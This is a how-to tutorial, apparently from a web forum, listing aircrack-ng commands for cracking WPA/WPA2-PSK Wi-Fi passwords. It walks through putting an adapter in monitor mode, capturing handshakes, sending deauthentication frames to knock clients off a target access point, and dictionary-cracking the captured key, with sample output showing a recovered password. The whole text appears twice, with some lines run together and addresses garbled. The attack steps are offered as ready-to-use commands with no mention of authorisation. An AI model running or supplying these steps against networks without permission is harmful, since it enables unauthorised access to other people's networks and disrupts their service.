This article is a summary of effective commands that just work.
With the help a these commands you will be able to crack WPA/WPA2 Wi-Fi Access Points which use PSK (Pre-Shared Key) encryption.
The objective is to capture the WPA/WPA2 authentication handshake and then crack the PSK using aircrack-ng.
The full tutorial about WPA/WPA2 cracking can be found here.
Here are the basic steps we will be going through:
0. Install the latest aircrack-ng
1. Start the wireless interface in monitor mode using airmon-ng
2. Start airodump-ng on AP channel with filter for BSSID to collect authentication handshake
3. [Optional] Use aireplay-ng to deauthenticate the wireless client
4. Run aircrack-ng to crack the WPA/WPA2-PSK using the authentication handshake
Install the Latest Aircrack-ng
Code:
sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
Download and install the latest aircrack-ng:
-O - | tar -xz
cd aircrack-ng-1.2-rc1
sudo make
sudo make install
Start the Wireless Interface in Monitor Mode
Find and stop all processes that could cause trouble :
Code:
sudo airmon-ng check kill
Start the wireless interface in monitor mode :
Code:
sudo airmon-ng start wlan0
Notice that airmon-ng enabled monitor-mode on mon0 :
Code:
Interface Chipset Driver
wlan0 RTL3137 wifi - [phy0]
(monitor mode enabled on mon0)
So, the correct interface name to use in later parts of the tutorial is mon0.
Start Airodump-ng to Collect Authentication Handshake
Now, when our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air.
It can be done with airodump-ng command :
Code:
sudo airodump-ng mon0
All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen :
Code:
CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:34:4b:5a -33 212 1536 66 1 54e WPA2 CCMP PSK CrackMe
66:77:88:99:00:11 -69 134 345 34 1 54e WPA2 CCMP PSK AsusAP
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC
D:EE:FF -44 0 - 1 114 56
00:11:22:33:44:55 GG:HH:II:JJ:KK:LL -78 0 - 1 0 1
66:77:88:99:00:11 MM:NN:OOP:QQ:RR -78 2 - 32 0 1
Now start airodump-ng on AP channel with filter for BSSID to collect authentication handshake for the access point we are interested in :
Code:
sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
-c The channel for the wireless network
--bssid The MAC address of the access point
-w The file name prefix for the file which will contain authentication handshake
mon0 The wireless interface
--ignore-negative-one Removes 'fixed channel : -1' message
Now wait until airodump-ng captures a handshake... or go to the step #3 if you want to force this process.
After some time you'll notice the WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen.
This means airodump-ng has successfully captured the handshake.
Code:
CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46 WPA handshake: 00:11:22:33:44:55
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CCD:EE:FF -44 0 - 1 114 56
Use Aireplay-ng to Deauthenticate the Wireless Client
This step is optional. If you can't wait till airodump-ng captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP and we'll capture the authentication handshake.
Send DeAuth to broadcast :
Code:
sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one
Send directed DeAuth (attack is more effective when it is targeted) :
Code:
sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CCD:EE:FF mon0 --ignore-negative-one
--deauth 100 The number of de-authenticate frames you want to send (0 for unlimited)
-a The MAC address of the access point
-c The MAC address of the client
mon0 The wireless interface
--ignore-negative-one Removes 'fixed channel : -1' message
Run Aircrack-ng to Crack WPA/WPA2-PSK
To crack WPA/WPA2-PSK, you need a password dictionary as input. You can download some dictionaries from here.
Crack the WPA/WPA2-PSK with the following command :
Code:
aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
-w The name of the dictionary file
-b The MAC address of the access point
WPAcrack.cap The name of the file that contains the authentication handshake
Code:
Aircrack-ng 1.2
[00:08:11] 548872 keys tested (1425.24 k/s)
KEY FOUND! [ iloveporno ]
Master Key : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97
CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5
Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8
AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6
DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9
A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3
EAPOL HMAC : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62
With the help a these commands you will be able to crack WPA/WPA2 Wi-Fi Access Points which use PSK (Pre-Shared Key) encryption.
The objective is to capture the WPA/WPA2 authentication handshake and then crack the PSK using aircrack-ng.
The full tutorial about WPA/WPA2 cracking can be found here.
Here are the basic steps we will be going through:
0. Install the latest aircrack-ng
1. Start the wireless interface in monitor mode using airmon-ng
2. Start airodump-ng on AP channel with filter for BSSID to collect authentication handshake
3. [Optional] Use aireplay-ng to deauthenticate the wireless client
4. Run aircrack-ng to crack the WPA/WPA2-PSK using the authentication handshake
Install the Latest Aircrack-ng
Code:
sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
Download and install the latest aircrack-ng:
-O - | tar -xz
cd aircrack-ng-1.2-rc1
sudo make
sudo make install
Start the Wireless Interface in Monitor Mode
Find and stop all processes that could cause trouble :
Code:
sudo airmon-ng check kill
Start the wireless interface in monitor mode :
Code:
sudo airmon-ng start wlan0
Notice that airmon-ng enabled monitor-mode on mon0 :
Code:
Interface Chipset Driver
wlan0 RTL3137 wifi - [phy0]
(monitor mode enabled on mon0)
So, the correct interface name to use in later parts of the tutorial is mon0.
Start Airodump-ng to Collect Authentication Handshake
Now, when our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air.
It can be done with airodump-ng command :
Code:
sudo airodump-ng mon0
All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen :
Code:
CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:34:4b:5a -33 212 1536 66 1 54e WPA2 CCMP PSK CrackMe
66:77:88:99:00:11 -69 134 345 34 1 54e WPA2 CCMP PSK AsusAP
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC
D:EE:FF -44 0 - 1 114 5600:11:22:33:44:55 GG:HH:II:JJ:KK:LL -78 0 - 1 0 1
66:77:88:99:00:11 MM:NN:OO
P:QQ:RR -78 2 - 32 0 1Now start airodump-ng on AP channel with filter for BSSID to collect authentication handshake for the access point we are interested in :
Code:
sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
-c The channel for the wireless network
--bssid The MAC address of the access point
-w The file name prefix for the file which will contain authentication handshake
mon0 The wireless interface
--ignore-negative-one Removes 'fixed channel : -1' message
Now wait until airodump-ng captures a handshake... or go to the step #3 if you want to force this process.
After some time you'll notice the WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen.
This means airodump-ng has successfully captured the handshake.
Code:
CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46 WPA handshake: 00:11:22:33:44:55
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC
D:EE:FF -44 0 - 1 114 56Use Aireplay-ng to Deauthenticate the Wireless Client
This step is optional. If you can't wait till airodump-ng captures a handshake, you can send a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP and we'll capture the authentication handshake.
Send DeAuth to broadcast :
Code:
sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one
Send directed DeAuth (attack is more effective when it is targeted) :
Code:
sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC
D:EE:FF mon0 --ignore-negative-one--deauth 100 The number of de-authenticate frames you want to send (0 for unlimited)
-a The MAC address of the access point
-c The MAC address of the client
mon0 The wireless interface
--ignore-negative-one Removes 'fixed channel : -1' message
Run Aircrack-ng to Crack WPA/WPA2-PSK
To crack WPA/WPA2-PSK, you need a password dictionary as input. You can download some dictionaries from here.
Crack the WPA/WPA2-PSK with the following command :
Code:
aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
-w The name of the dictionary file
-b The MAC address of the access point
WPAcrack.cap The name of the file that contains the authentication handshake
Code:
Aircrack-ng 1.2
[00:08:11] 548872 keys tested (1425.24 k/s)
KEY FOUND! [ iloveporno ]
Master Key : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97
CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5
Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8
AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6
DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9
A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3
EAPOL HMAC : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62